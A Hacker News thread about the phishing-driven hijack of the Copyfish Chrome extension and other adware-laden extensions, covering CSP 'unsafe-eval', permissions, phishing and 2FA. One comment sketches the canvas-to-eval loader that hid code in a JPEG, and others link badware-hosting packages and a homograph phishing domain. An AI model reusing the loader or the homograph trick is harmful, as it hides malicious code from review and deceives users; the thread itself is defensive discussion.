Our Copyfish extension was stolen and adware-infested (a9t9.com)



I guess this is as good a place as any to post that I noticed something similar had happened to [User-Agent Switcher for Google Chrome](https://chrome.google.com/webstore/detail/user-agent-switche...) and [Block Site](https://chrome.google.com/webstore/detail/block-site/eiimnmi...). The "report abuse" link on the page is useless. The former is very insidious in that it actually hides the malware in a .jpg file that appears benign at first (promo.jpg, for anyone who wants to analyze it), but when loaded into a canvas element and decoded in some manner it yields JS that sends all the user's HTTP requests to some domain while also injecting ads and redirecting to affiliate links.
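For anyone curious, the general shape of that canvas trick looks roughly like this (a minimal sketch of the technique, not the actual promo.jpg decoder; the terminator byte and red-channel encoding are assumptions):

  // Draw an innocent-looking bundled image, read back its raw pixels,
  // reassemble the hidden bytes into a string, and eval() the result.
  const img = new Image();
  img.onload = () => {
    const canvas = document.createElement("canvas");
    canvas.width = img.width;
    canvas.height = img.height;
    const ctx = canvas.getContext("2d");
    ctx.drawImage(img, 0, 0);
    const { data } = ctx.getImageData(0, 0, img.width, img.height); // RGBA bytes
    let payload = "";
    for (let i = 0; i < data.length; i += 4) {
      if (data[i] === 0) break;                // assumed terminator byte
      payload += String.fromCharCode(data[i]); // e.g. code hidden in the red channel
    }
    eval(payload); // only possible because the manifest allows 'unsafe-eval'
  };
  img.src = chrome.runtime.getURL("promo.jpg");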


> it actually hides the malware in a .jpg file that appears benign at first (promo.jpg for anyone who wants to analyze) but when loaded in a canvas element and decoded in some manner

I am guessing the extension had a "content_security_policy" key in its manifest[1], with an 'unsafe-eval' CSP source in its value?

Any extension which declares such a CSP source in its manifest should be presumed malicious until thorough investigation proves otherwise.

Declaring 'unsafe-eval' in a manifest essentially gives an extension the ability to execute arbitrary code in the extension context, code which can't be reviewed by reading the source files.

EDIT:

"User-Agent Switcher for Google Chrome" confirmed to have a 'unsafe-eval' in its manifest.

"Block site" does not declare 'unsafe-eval' in its manifest. It does however add many "script-src" directives in its manifest, including one for ".wips.com", which means the extension can pull javascript resources not bundled with the extension from its own web site (hence outside of the Chrome store review process if any), and thus the behavior of the extension is subject to change at any time as far as its permissions allow.

So I guess the suspicion should be extended to any extension declaring a "content_security_policy" key in its manifest.
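For illustration, such a red-flag manifest might look like this (a hypothetical, minimal example; the extension name is made up, and the wips.com source mirrors the one found above):

  {
    "name": "Hypothetical Suspicious Extension",
    "version": "1.0",
    "manifest_version": 2,
    "content_security_policy":
      "script-src 'self' 'unsafe-eval' https://*.wips.com; object-src 'self'"
  }

Both the 'unsafe-eval' keyword and the remote script-src host let the extension's behavior change after review.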

===

[1] https://developer.mozilla.org/en-US/Add-ons/WebExtensions/ma...


So how do unsafe-eval and dynamically loaded scripts pass any sort of "Google security scan"?

It would seem obvious that the moment a script tries to load arbitrary code outside of the package, it should fail.


Because unfortunately many, many libraries and templating engines rely on evaling code.

Generated code is code that's outside of the package.
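For instance, the common template-compilation pattern (a minimal sketch, not any specific library) builds a function from a string at runtime, which CSP treats the same as eval:

  function compile(template) {
    // "Hello {name}" -> function(data) { return "Hello " + data.name + ""; }
    const body = "return " + JSON.stringify(template)
      .replace(/\{(\w+)\}/g, '" + data.$1 + "');
    return new Function("data", body); // blocked without 'unsafe-eval'
  }
  const greet = compile("Hello {name}");
  greet({ name: "world" }); // "Hello world"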

There are also a few (keyword: FEW) valid reasons for using eval in situations where it's beneficial to pull updates and modules from a known and trusted location.

In those cases though, if you're not signing server side and validating signatures in the extension with a pre-shared cert, you've still got problems (single MITM attack can compromise your extension going forward).

Long story short, eval is still a very useful feature. It needs to be used properly, and it should be used rarely, but it's incredibly powerful, and lots of things you don't really think about suddenly stop working if it goes away.


> Long story short, eval is still a very useful feature.

And yet this is Mozilla's stance regarding extensions pulling code from outside the extension's own package[1]:

> extensions with 'unsafe-eval', 'unsafe-inline', remote script, or remote sources in their CSP are not allowed for extensions listed on addons.mozilla.org due to major security issues.

This is the sane stance in my opinion, with the best interests of users at heart.

I would like to be shown an actual, real case of why eval() would be impossible to avoid for an extension, not just a theorized one with no real sensible and convincing example. As much as I try, I can't come up with any such scenario.

[1] https://developer.mozilla.org/en-US/Add-ons/WebExtensions/ma...


You're really unable to come up with a single example of why treating data as code isn't useful?

I mostly agree with you, eval is dangerous and often improperly used, but it's ALSO an incredible tool.

The complete opposite of your argument is homoiconic languages (https://en.wikipedia.org/wiki/Homoiconicity): they're built in a way that explicitly allows manipulating code as data, even the language itself, as a FEATURE.

They include languages like Lisp/Clojure/Julia.

Worse, many of the ways to "work" around the lack of eval just reduce the attack surface, or make the attack considerably less likely (obfuscation not security!).

Simple case: You need to apply certain policies to certain sites, those policies vary based on the browser in use, the country of origin of the user, and the country the site is hosted in.

The way that those policies vary... ALSO varies. As new legislation is passed, or corporate policies change, or certain countries become more or less stable.

A (completely valid) way to solve this problem would be to send both a policy engine and a policy set to the extension. The policy engine is eval'd and runs the policy set.

That allows real-time updates to the deployed extension's ability to parse new policies. Not just different data in the policies, mind you, but actual new policy capabilities.

Do you have to use eval? Nope, sure don't. You can define a custom EBNF grammar (hell, why not just use the EBNF for ECMAScript), write your own freaking engine, and run it. All without eval. But you're still just running eval. You just get to give it a nicer name, introduce an incredible amount of overhead to recreate a feature someone has already provided, and generally get less performant results.

Or, you can just fucking sign the payload with a pinned cert and verify on the client, and get the same guarantees for security you have with HTTPS to begin with.
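A minimal sketch of that sign-and-pin approach (assumed key material and URLs; ECDSA P-256 via WebCrypto), with the caveat that the final eval still requires 'unsafe-eval' in the manifest:

  const PINNED_JWK = { kty: "EC", crv: "P-256", x: "...", y: "..." }; // shipped in the package

  async function loadSignedModule(codeUrl, sigUrl) {
    const [code, sig] = await Promise.all([
      fetch(codeUrl).then(r => r.arrayBuffer()),
      fetch(sigUrl).then(r => r.arrayBuffer()),
    ]);
    const key = await crypto.subtle.importKey(
      "jwk", PINNED_JWK, { name: "ECDSA", namedCurve: "P-256" }, false, ["verify"]);
    const ok = await crypto.subtle.verify(
      { name: "ECDSA", hash: "SHA-256" }, key, sig, code);
    if (!ok) throw new Error("signature mismatch: refusing to run payload");
    eval(new TextDecoder().decode(code));
  }

Unlike bare HTTPS, a MITM or compromised CDN can't swap the payload without also holding the pinned signing key.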


"Treating code and data" doesn't specifically require eval. Lisp macros avoid eval. Dynamic extensions to a running Lisp program don't require eval, but rather load.


Sure, but you're still taking data from outside of your original package scope and running it or allowing it to be run later.

That's just useful. JavaScript eval gets a bad rap (entirely in my own opinion) because

1. It's the de-facto language for the web, which both drastically increases the number of inexperienced developers, as well as the total attack surface.

2. Again, as a scripting language for browsers, parsing untrusted user input is a common need. Eval filled the need for parsing, but not the need for trust.

You can absolutely use eval in entirely safe ways. Most people don't, and doing so (especially in JS) is hard. That's because JS has made establishing trust hard. Juuuuust recently, with the introduction of some of the webcrypto work, and the rapid rise of ubiquitous https are we really getting to the point where doing so is really feasible at all.


Indeed they do. I can think of much of the NPM ecosystem, which assumes (incorrectly) that packages are unique, stable, and good. That whole situation a while back showed that not to be the case.

I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change. Primarily, immutability. I'm thinking of something like an IPFS repo which is "elsewhere", but still very much crawl-able, scannable for bad stuff (aside from Turing issues...), and can be shown to reproduce content if it is broken.

Also, using an immutable self-certifying system would solve the second point, regarding the single MITM. The trust would be with the file/package, and not some ephemeral cert (whose trust is brokered from above).


>I'd be OK with grabbing code elsewhere, as long as I could guarantee that it would never change.

But there are lots of times when the final result is much more valuable when the code CAN change.

You just have to have trust.

1. Trust that the folks who can change the code aren't malicious.

2. Trust that the code you think you're running is really the code you're running.

Neither of those things are really too much of a stretch. And the services and capabilities they allow are very, very nice.

Hell, statistically speaking... we're both typing these comments in Google Chrome, a browser that auto-updates itself all the time.

But 1. we trust that Google won't suddenly become malicious, and 2. we trust the mechanisms in place (https, cert pinning) to ensure the update is really the update Google sent.

In fact, this whole article actually boils down to a breakdown of trust: Turns out random extension devs aren't as trustworthy as we might like. They make mistakes and there's no safety net.


If it can't change, then what's the point of grabbing something elsewhere instead of just embedding it in the addon?


I am mortified. I had this extension installed for 2 years... What info did they get and what can they do to me? Please help... (I uninstalled it, talking about User-Agent Switcher)


I had the same concern when I found out. I narrowed it down, and it was probably only within the last ~5 months that it was updated to include the badware. I don't have the skills to decode it fully (since it was obfuscated quite heavily) but I know at the very least that it sends browsing history and injects ads.

I'm not sure if extensions also have the capability to capture the https body info, but I erred on the safe side and also changed passwords.


Are you sure it's "User-Agent Switcher for Google Chrome", not just "User-Agent Switcher"? See my other comment that refers to the difference.


That is some fine detective work there, Lieutenant! :) What tipped you off in the first place to the malware in User-Agent Switcher?


The odd post requests I noticed to uaswitcher.org in wireshark while I was trying to create a packet capture. I saw that it contained my browsing history urls in double encoded base64 format. Interestingly it appears the extension was infected ~4 years back, taken down, and somehow later re-added, only to be reinfested with malware within the last few months. Suffice to say, I am now paranoid and have audited all my extensions, tossed out everything with obfuscated js, and run all my extensions in developer mode so I can be sure they never update without my consent.


I don't use browser extensions at all because they are often made by unknown developers and I cannot trust them.


I always thought it was strange that Google bothered adding so many XSS prevention measures to Chrome when they also happily give UXSS abilities to extension developers, complete with the veneer of trust provided by the Chrome web store.


> veneer of trust provided by the Chrome web store

Seriously? Who trusts the Chrome store or the Android store for that matter? If you've ever once submitted an app and seen how loose the security is, I can't see how you'd have any faith in their system.


You're violently agreeing here. "Veneer" means a very thin layer of pretty material on top of cheaper material -- in this context the comment was saying that the trust afforded to Google is skin-deep and is probably unjustified.


Ahh you're quite right. Apologies, not enough coffee yet.


And if an extension is not downright malignant, it is often slow.


> urls in double encoded base64 format

I've seen that somewhere else; is it just for obfuscation? Or is there some other reason for it?


From what I've seen online a lot of these adware extensions do something similar. To me it doesn't make sense as an obfuscation method since anyone capable of capturing traces of network activity (or using chrome dev tools to do the equivalent) can probably recognize a base64 encoding and can just run the decoder a second time.

Maybe it might fool some automated analyzers though.


I've definitely seen naive analyzers just do something like:

  input string
  if string is base64-encoded:
      string = base64decode(string)
  output string

With no recursion for an iterated check of any sort of encoding.
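An iterated check is only a few lines more (a minimal sketch; the regex and depth limit are assumptions):

  // Keep decoding while the output still looks like base64,
  // instead of stopping after a single pass.
  function deepDecode(s, maxDepth = 10) {
    const b64 = /^[A-Za-z0-9+/]+={0,2}$/;
    for (let i = 0; i < maxDepth && b64.test(s); i++) {
      try { s = atob(s); } catch { break; }
    }
    return s;
  }
  deepDecode(btoa(btoa("https://example.com/"))); // "https://example.com/"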


Beware: I also have a User Agent Switcher extension installed and was surprised to hear about this malware. Looks like the one I've been using safely is called "User-Agent Switcher" (https://chrome.google.com/webstore/detail/user-agent-switche...) and is only 23KB (whereas the "... for Google Chrome" is at 350KB).


For reference, on Windows the Chrome extensions are stored in a path *similar* to this one I have:

C:\Users\<login.name>\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkmofgnohbedopheiphabfhfjgkhfcgf\2.0_0

"lkmofgnohbedopheiphabfhfjgkhfcgf" is the identifier for the user-agent extension I've been using for a while, and looking at the code, it's very straightforward and not spying on anything. It has not been updated since 2013 (and the website listed for the dev, www.toolshack.com, is not online), so I'm guessing a lot of users just go with other extensions that have received updates.

BTW, Google itself offers a similar extension at 120KB called "User-Agent Switcher for Chrome" (not "... for Google Chrome") here: https://chrome.google.com/webstore/detail/user-agent-switche...


Damn! I was using this all along! Removed it immediately and checked the Chrome store for an alternative; there's one from Google itself.


You're referring to this one right?

https://chrome.google.com/webstore/detail/user-agent-switche...

Is there any way to confirm that this is actually from google though, and not just some 3rd party who chose their publisher name as "google.com"? Most official google extensions have a "by google" badge in the right hand column whereas this one lacks it.


It's interesting, if you go to the support tab and follow the link to the maker's support website, you end up on https://spoofer-extension.appspot.com/ The contact page there links to "Glenn Willson" as the author - and their G+ page has a link to The User-Agent Switcher Has A New Owner: Google! http://www.glennwilson.info/2017/02/the-user-agent-switcher-...

Now, is that trustworthy or not? Good question.


Search for an official Google Chrome extension (such as Chrome Remote Desktop). You'll see a 'By Google' logo (https://chrome.google.com/webstore/category/collection/by_go...) as well as an 'offered by google.com'.

This just has the 'offered by google.com'. I would have assumed a 'By Google' logo would have been added after acquisition?


If you go to the listing of all Google extensions (the URL you linked) and open the "Chrome Sign Builder" Extension, go to Related -> "More from this Developer" you will find the User-Agent Switcher for Chrome. So it does seem legit.


Well, the LinkedIn checks out too: https://www.linkedin.com/in/wilsong

Of course, forgeable as well.

I've sent an email to his anonymized domain registrant contact to see if he can do anything about his malicious competitor.


Wow, I went to try and add a 1-star review to each to warn users (since both have extremely high ratings) and you need to install the malware-ridden extension to leave a review.

So we have a web store that average Chrome users think is "safe," especially when apps have high review scores, and no meaningful ability to report malware to Google or to the users. Nice.


There is literally a 'Report Abuse' button about two inches below the download button. That's what you use in this case. Being able to leave a review of something you haven't tried would just be silly.


Are there any known problems with Random User Agent?


Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action. While this will be an interesting UX challenge, defaulting to domain-specific permissions is the sane thing to do in this age.

Case in point, I don't care about a readability or bookmarking plugin reading a news link, but it shouldn't read my bank page.


I think more granular permissions, not domain-specific permissions, are the solution. Domain-specific permissions destroy the illusion that the extension is part of the browser, without restricting access as far as it should be.

For example, I made an extension that, upon a certain keyboard shortcut, saves the current page in a specific bookmarks folder. Currently Chrome's permissions model completely fails here: you need to request full access to all user data, everywhere, indefinitely.

Which would be better, (a) granting full indefinite access to the domain you're bookmarking most of the time you bookmark something, or (b) giving the extension permission only to see the current tab's URL and title, and to edit one specific bookmarks folder, and only during a keyboard shortcut's callback?

The granularity solution to your scenario would be to tie page-reading permissions to your triggering the extension, and have them removed with code execution end. So, now you don't need to worry about sensitive information that shows up on other domains, or your bank deciding to use a subdomain, or that one bank blog post that you actually do want it to see.


Isn't this what the "activeTab" permission is for (combined with a shortcut to trigger the extension's pageAction)?
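A minimal sketch of what that would look like (the folder ID is hypothetical; per Chrome's docs, a command keyboard shortcut counts as invoking the extension, which is what grants activeTab):

  // manifest.json (excerpt)
  // {
  //   "permissions": ["activeTab", "bookmarks"],
  //   "commands": {
  //     "save-bookmark": {
  //       "suggested_key": { "default": "Ctrl+Shift+S" },
  //       "description": "Bookmark the current tab"
  //     }
  //   }
  // }

  // Background script: the shortcut grants access to the current tab's
  // URL and title only, and only at the moment it is pressed.
  const FOLDER_ID = "123"; // hypothetical bookmarks folder
  chrome.commands.onCommand.addListener((command) => {
    if (command !== "save-bookmark") return;
    chrome.tabs.query({ active: true, currentWindow: true }, ([tab]) => {
      chrome.bookmarks.create({ parentId: FOLDER_ID, title: tab.title, url: tab.url });
    });
  });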


There's a good flag to make "Read data from all websites" more reasonable.

chrome://flags/#extension-active-script-permission

It requires a "deliberate, explicit user action" to run the extension on the page each time even if it asks for that permission. And if you really do want an extension enabled 24/7 (such as vimium), then you can select a check box in the extensions page which allows the extension to run without specifically enabling it each time.


More or less why I run a fairly minimal set of extensions. I was looking for a bulk downloader about a week ago, and the only ones I found requested "Read data from all websites", which is a lot of trust to put in something I have limited ability to test or to know if it is malicious.

Side note: Chrome appears to have moved Extensions out of Settings since I last looked, and the "search settings" bar doesn't bring it up either. Took me a few minutes to find how to get to them.


> I was looking for a bulk downloader about a week ago, and the only ones I found requested "Read data from all websites", which is a lot of trust to put in something I have limited ability to test or to know if it is malicious.

AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?

Compare that to Firefox's model (at least, the old XUL model), where every extension essentially runs as the Firefox equivalent of "root".

But by making nearly every extension sound evil, even the ones that aren't, users get used to accepting every permission request, or not installing any extensions at all.

IMO the danger is worse with Chrome. At least with Firefox, you know that every extension can potentially be malicious. With Chrome, what happens is, you install an extension that has nice-sounding permissions. Then 3 months later, it gets sold to an ad/malware company, they push out a new version that reports every URL you visit to their server, and you see a popup saying that some extension needs more permissions. Maybe you notice it, maybe you think nothing of it--or maybe the browser window steals focus while you're typing and the OK button gets pressed without your even realizing it.


> AIUI that's a consequence of the Chrome extension security model. How could a bulk-downloader extension download files from arbitrary web sites without "Read[ing] data from all websites"?

What I was hoping for was something along the lines of "<Download Extension> wants to access this page" (similar to the notification when a website tries to access your location) upon use. I've no idea if that's possible or not in the Chrome security model.


I don't think it currently is. I guess that would work, if you didn't mind a lot of popups every time you visit another web page... :)


"Chrome's security policy is surprisingly poor and is the reason why I stay away from most extensions. "Read data from all websites" is like root on the phone. It should be allowed only via deliberate, explicit user action."

What we really, really need is the ability to jail (and tie to a different IP) a browser instance.

I want this so much that I am somewhat seriously considering learning the syntax of the vmware fusion command line tool so that I can quickly fire up a browser VM with just a command (and revert state to "clean" snapshot, etc.).

The problem, of course, is that this use-case is so compelling that in a short amount of time I would have 5 or 6 browser VMs running and now I am running out of memory ... it's silly to fire up an entire virtual machine just to run the browser.

However, the existing sandbox measures are not nearly enough. I want to do my banking from a different IP than I use google services from. Every day I want to wipe that OS to clean state and start over.

This is not an easy configuration. Even with an OS (FreeBSD, Solaris) that has jail it's not simple to locally interact with a GUI tool on your existing desktop that is actually in its own jail ...


Isn't installing an extension a "deliberate, explicit user action"?


> “Click here to read more details” the email said. The click opened the “Google” password dialog, and the unlucky team member entered the password for our developer account. This looked all legit to the team member, so we did not notice the pishing attack as such at this point. Pishing for Chrome extensions was simply not on our radar screen.

First, it is excellent that you disclosed the issue.

Second, based upon the quoted text you really aren't accepting responsibility for having been phished. The team member wasn't "unlucky." Your "radar" shouldn't trick you into thinking you won't be attacked.


While I normally agree, I think it's important that they referred to the specific person without using blaming language. The team failed and screwed up because they had bad policies with their account. The individual team member who was holding the keys when the screw-up happened? Unlucky.

Fix the process, not the people.

It's good that they're not throwing the poor person under the bus.


I really wasn't calling to "fix the person."

I agree with you. The email makes the situation appear as a process issue. Based upon the disclosure text, it seems quite possible the person wouldn't normally have clicked on an email text, but did so here based upon process.

The disclosure displayed the attitude that they shouldn't have expected to get phished. It's 2017. Lots of people get phished.

It's pretty straightforward to never click links that arrive in emails, to never enter passwords into webpages that open on their own.

Of course there are technical ways to mitigate this specific attack, but it is more important not to excuse poor Internet hygiene after the fact.


Stating what happened is not blaming language.

Characterizing the act as "unlucky" is excusing language, just as bad as blaming language.

Assigning an error to mystical forces is unhelpful.

Simply stating that the person entered the password into a phishing site is not blaming language, it is factual.


I would kindly ask that the person who has never made a mistake throw the first stone.


I'm with you, this entire thread has brought out the captain hindsight in everyone.


I don't think more policies will make this a better place. One of the team members screwed up and stuff like this happens. I am questioning their security education, to have been phished so easily.


It's counter intuitive. I bet you $5 that if I target you, and you're not expecting it, I can phish you. I've seen this happen in the field, and it doesn't have much to do with education. Relax for an instant and I have you.

The only real defense is to glance at the url bar every time you're about to enter your password. And even I find myself not doing that 100% of the time. It's a numbers game.

A policy of showing a popup saying "glance at the url bar" every time you copy your password from your password manager (which you're using, right?) would go a long way.


>> The only real defense is to glance at the url bar every time you're about to enter your password

With Google specifically, the worst part is you really do have to look at the URL every single time you go to enter your password. And by that I mean that if you land on the login page, verify the URL, enter your password, submit, and get the error page saying you got the password wrong... you must check the URL again before re-entering your password.

Why? Because Google's login, by design - and repeatedly defended by them as being "acceptable" - allows redirecting off Google's properties after login. So hackers send you to the real Google login page, with a post-login redirect to a fake but perfect copy of the "wrong password, try again" page, where they then capture the passwords of people who mindlessly re-enter their password without double checking the URL a second time.

Most importantly, 2FA does not help you here. You'll enter a currently valid 2FA code on the hacker's site, and they will immediately use that code to actually log in to your account. Before you realize what is happening, you are already locked out of your account - new password, 2FA stripped or replaced, security questions changed, and all pre-existing sessions/devices wiped.


U2F is a second factor which can't be easily phished. If you are using a service which supports U2F and care a minimum about being secure, enabling it is the least you should do.


Physical keys would solve the problem of redirecting to a fake page (and maybe they would make third-party auth protocols like OAuth or GitHub login unnecessary).


U2F physical keys specifically. Physical keys that generate OTPs would not protect you.


Pretty sure Google and other sites will do another 2FA challenge when you try to remove or change the 2FA challenge.


Most do not, and even Google doesn't. I just verified on my account. You only need to provide your password to access account settings. Completely stripping all two-factor authentication requires no additional 2FA code.


The phisher just shows you a "password incorrect" message on the first attempt. Assuming you made some typing mistake, you enter your password and 2FA again...


> The only real defense is to glance at the url bar every time you're about to enter your password.

With i18n not even that: https://www.theguardian.com/technology/2017/apr/19/phishing-...

Benign POC: https://www.xn--80ak6aa92e.com/ (open it and it'll look like a normal "l" in the url box)
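Scripts can at least detect the punycode form, since URL parsing normalizes IDN hostnames (a minimal sketch):

  // Flag hostnames containing an IDN label; the URL parser returns
  // Unicode labels in their "xn--" punycode form.
  function looksLikeIDN(href) {
    const host = new URL(href).hostname;
    return host.split(".").some(label => label.startsWith("xn--"));
  }
  looksLikeIDN("https://www.xn--80ak6aa92e.com/"); // true (the POC above)
  looksLikeIDN("https://www.apple.com/");          // false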


Browser shows https://www.xn--80ak6aa92e.com to me, Chrome on Android. What browser are you using that shows non-ascii with .com?


Firefox for android at least shows it as Unicode


I activated the setting so it would display the punycode. Every major browser up to a few months ago would show it as "apple", not sure now. But we know many people cannot just upgrade their browsers, so there must still be many vulnerable browsers out there.


Firefox on OSX shows it appearing as "www.apple.com"


Same, FF54.0 on Ubuntu 17.04.


Latest Chrome and Safari shows that as https://www.xn--80ak6aa92e.com, no puny code


Lastpass will tell you whether it recognizes the site when you go to fill in the password (yes, I use it despite the scary stuff, I know I probably should switch to 1Password).

Do other password managers not do that?

Just curious, not trying to engage the bigger question of whether getting phished is the user's fault.


1Password has similar behaviour, as well as verifying the integrity of the browser[1]. It's not perfect, I'm sure a malicious extension would be unimpeded, but these little features all added up and eventually made me switch.

[1] https://support.1password.com/code-signature/


I use KeePassX, mostly because it's small and nearly impossible to attack. But I understand the desire for convenience, and as you say, there are some advantages to other managers.


No, not that I've seen. lastpass has issues, but it also has some pretty advanced stuff.


Take a look at lesspass


I use iCloud keychain. Safari autofills passwords only if the URL matches. If the password doesn't autofill, I know something odd is going on. Makes it trivial to recognise phishing sites like the one from the linked blog post.


That's a good habit, but a good tool to help you avoid getting phished is https://support.google.com/a/answer/6197508?hl=en

It alerts if you enter your google password anywhere but the real google sign in page.


Ah, the delightful irony. Install a chrome extension to warn you if you get owned by a chrome extension.


That seems like something that should be part of Chrome once you login, not an optional extension.


An email from Google with a bit.ly link? Hell no, I hope I wouldn't fall for it in any situation.

I agree that no defense is perfect, but IT professionals shouldn't fall for an unsophisticated attack like this, even when not working in security. And I am not even talking about web developers.


And you would be wrong about that. They do. All the time. Spear phishing is still the most effective way for foreign nationals to breach US companies.

Now, there are two ways to deal with the situation. Demonize, or accept. The demonize/blame approach doesn't work.


> An email from Google with a bit.ly link?

The article clearly explains that "the bitly link was not directly visible in the phishing email, as it was an HTML-email."


Disabling HTML e-mails does not sound particularly unreasonable. There's little additional benefit from them but a whole host of possible issues, not least that suddenly your e-mail client has to deal with properly parsing HTML and you have to decide whether or not to load remote images and potentially execute JavaScript.


I've never read my email in HTML, mostly for security reasons such as this incident. For the rare occasion where an email doesn't render correctly, Thunderbird's "Show HTML" button works a charm.

Have I been able to convince a single customer (I run a computer services business) or friend to follow my lead? Nope, not a single one.


I have no idea why your post was downvoted. Your post is clearly correct.


That too can be fooled. Much better to log in to the relevant account by manually opening a new tab and navigating to it. In this case, once they saw no link or call to action on their Google developer dashboard, they should have realized something was afoot.


Mmm, maybe. I'm certainly not immune to being fooled. I am careful, however. I roll over and check any link in an email before I click it, and I know when I am or am not authenticated into one of my google accounts. It's all too easy, though, to make a mistake like this when you're in a hurry or don't give something enough thought. The email was very good but after reading it a couple of times the language strikes me as not _quite_ right, especially the "unless you fix it" part at the end. Perhaps the key insight is that you have to assume going in that any email you get like this is fake, and then prove otherwise.


> The only real defense is to glance at the url bar every time you're about to enter your password.

No. FIDO hardware 2fa works fine for this.


In this particular case, though, there were enough warning signs that I wouldn't want to run code by anyone who wouldn't notice them on my machine. The email was clearly not professionally written or machine-generated (note the comma inside the quotation marks around the app name; the oblique "fix the issue" doesn't seem like the right expression to match "did not comply with our program policies"), the ID is clearly non-random (a cluster of keys on the left-hand side of a QWERTY keyboard interspersed with a cluster of keys on the right-hand side, as you would get if you mashed keys randomly) and then there's of course the URL shortener link.


As someone who's been phished even though I've written articles on phishing in the past, all it takes is a moment of weakness.

In my case everything looked normal at a glance. 2FA saved me, but if they'd asked for 2FA I wouldn't have noticed.

https://blog.greggman.com/blog/getting-phished/

Other people getting phished

https://www.exploratorium.edu/blogs/tangents/we-got-phished-...


A simple policy to add would be 2-factor authentication, no single shared developer account, and (on Google's side) both another security challenge (2FA) and e-mail notification to both a primary and recovery e-mail address when an extension is moved. Pretty sure Google also raises a question when logging in from a new device, e.g. from Russia, or when certain information is changed. (I know Facebook did, at least.)



Incorrect. They literally declared "we were phished", in plain words, describing how they were phished and the resulting attack. To say this does not "accept responsibility" is bullshit. You don't get to light the torches and grab the pitchforks to go chase some stranger who exposed you to vulnerability. They are human, they failed, and they're dealing it with professionally.

I'm assuming from your tone of "I demand his head" that you were running the compromised extension, and wish to extract your pound of flesh from the person who compromised you. (EDIT: If not, what's your beef with them? Are you a competitor? Please explain!) This, too, is wrong. And here's why we don't play the blame game when it comes to human failures:

You chose to run a Chrome extension, from an untrusted source, with only machine automation vetting its contents and auto-update ensuring that you get the latest attack. Of course you got compromised. What else did you expect? How could you place ultimate trust for all content in your browser in the hands of an OCR extension?! What on earth could compel you to accept such a ridiculous risk in exchange for this?

Everyone's human, you included. They clearly stated and accepted responsibility for the incident. Now you need to stand up and accept responsibility for running unvetted code in your browser. (EDIT: Yes, it's machine-vetted. How's that working out for you?)

There's more than enough blame to ensure you get an equal portion. Being human is bad enough without people coming to destroy you because they'd rather not confront their own failures of judgement. Get over your immature desire to get your vengeance for being compromised and build a better approach to your own personal security.


Accepting responsibility for being a victim of phishing? That could happen to the best of us.


And it has. Part of my infosec career was spent phishing devs. Everyone scoffs at it until it happens to them. It's quite effective.


Likewise. I just hate this attitude of "they should have known better".


They should have known better - not to click on a link in an email. This is absolutely basic.


I rely on my password manager: if it isn't filling in the password automatically, something is suspect. I wonder if I'm the only one who does this.


I used to do that till LastPass had several vulns [1] in which passwords to all sites could be obtained by a malicious page or extension.

If you use a password manager that auto-fills passwords, it is open to attack by a site or program that can fool it into thinking you have visited the site.

Any malicious extension, such as the one compromised here, has a good chance of being able to drain all your passwords. You are probably safer, even with phishing threats, to paste passwords in from another program each time.

[1] http://thehackernews.com/2016/07/lastpass-password-manager.h...


I am aware of that bug. However, Google wants to replace lastpass with Chrome sync, so no surprise that their employees are attacking it. Hopefully that made it better.

I doubt even pasting it in is completely secure.


Granted, it being a team account might have made usage a bit more complicated, but this sounds like something 2FA would have prevented, as even with the password the hackers wouldn't have been able to log in.


I find it strange the team member clicked on the link. For such high value accounts, always use google or type in the URL.

Why would you click?


And worst of all, it was a bit.ly link they clicked.


Can you paste this email here?


The password login system is seriously flawed. I think people and websites should switch to physical keys. They are also easier to use because you don't have to remember complicated passwords.


Looks like they are using unpkg.com and npm to distribute the badware:

https://unpkg.com/copyfish-npm-2-8-5@1.0.1501416918/

https://www.npmjs.com/package/copyfish-npm-2-8-5

I reached out to both services to have it shut down. Hopefully that will at least kill it temporarily.


Unpkg has a blacklist, so you can put up a PR if you know the package IDs.

https://github.com/unpkg/unpkg.com/commit/ac09a03c75a51997b9...

A similar thing happened with another Chrome extension Social Fixer about a month ago.

EDIT: It's already been blocked, nice work @mjackson

https://github.com/unpkg/unpkg-website/commit/7d4a4ba4958c16...


A similar attack happened on another Chrome extension last month (Social Fixer) with over 190k installs.

In fact, judging by the exploit code, I would guess it's the same author, as the Social Fixer attack had a very similar hashed package on Unpkg as well.

In that scenario the author also didn't have 2FA enabled: https://www.facebook.com/socialfixer/posts/10155117415829342

I feel like Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.


> Google should take the next step of requiring all extension developers to enable 2FA before being able to post an extension.

Best comment here


Which would allow real-world identity to be discovered. In the event of malware, is there a possibility of prosecution, e.g. for something related to recklessly causing damage (through action or inaction)?


This is why it is important to cryptographically sign releases. Browsers are a huge problem with this.

All of the software I use is signed at some point in the chain (be it by the actual author or by the package manager, who'd better be verifying signatures if they're available, otherwise at least not blindly updating), _except for my browser extensions_. Most of it is also _reproducible_! I can get around this for some things---I use GNU Guix in addition to Debian, and they package some extensions. I need to start using them.

Of course, the signature should really come from the actual author, not the package maintainer for a particular distro; there's room for error. In the case of a project being hijacked (e.g. Copyfish), hopefully a maintainer would notice. Git commit and tag signing is an easy way to do this if you don't separately sign releases; package maintainers should be building from source.

In the case of Copyfish: if the browser validated signatures from the authors, then this would have been thwarted.

(Maybe there is some code signing protections in place? I'm not an extension developer for either Chromium or Firefox; please let me know if something does exist!)


My understanding is that Chrome extensions are indeed signed and you can't upload updates without signing the new package with the same key, so presumably the attacker had access to the private key after phishing the Google password.

Perhaps it was stored somewhere accessible by that account? Or accidentally packaged with the extension itself? If that were the case the spear phishing attack would make sense: someone scraping the Chrome store for extensions that contain a key file, then phishing their developer account credentials would be more efficient than phishing credentials without knowing beforehand whether you'd be able to get the private key and update the extension.

https://developer.chrome.com/extensions/packaging


Thanks.

What's concerning to me is the section entitled "Uploading a previously packaged extension to the Chrome Web Store", which asks the user to place the private key into the package's root and include it in a zip. First: why? Why upload the private key? That leaks it to Google and on top of that stores it in multiple places; the user could forget to delete the zip (and do so securely), for example. And the private key in the root is probably a copy, so that has to be shredded too.

For updating the package, you select the project root as well. If you didn't remove your private key before doing so, I'm assuming you'd be releasing your key?


This is the second extension that I use on chrome that has been hijacked.

The first was live http headers [0]

I have never had this experience on Firefox.

Is it simply a matter of Chrome being a bigger target?

[0] https://www.webmasterworld.com/webmaster/4829365.htm


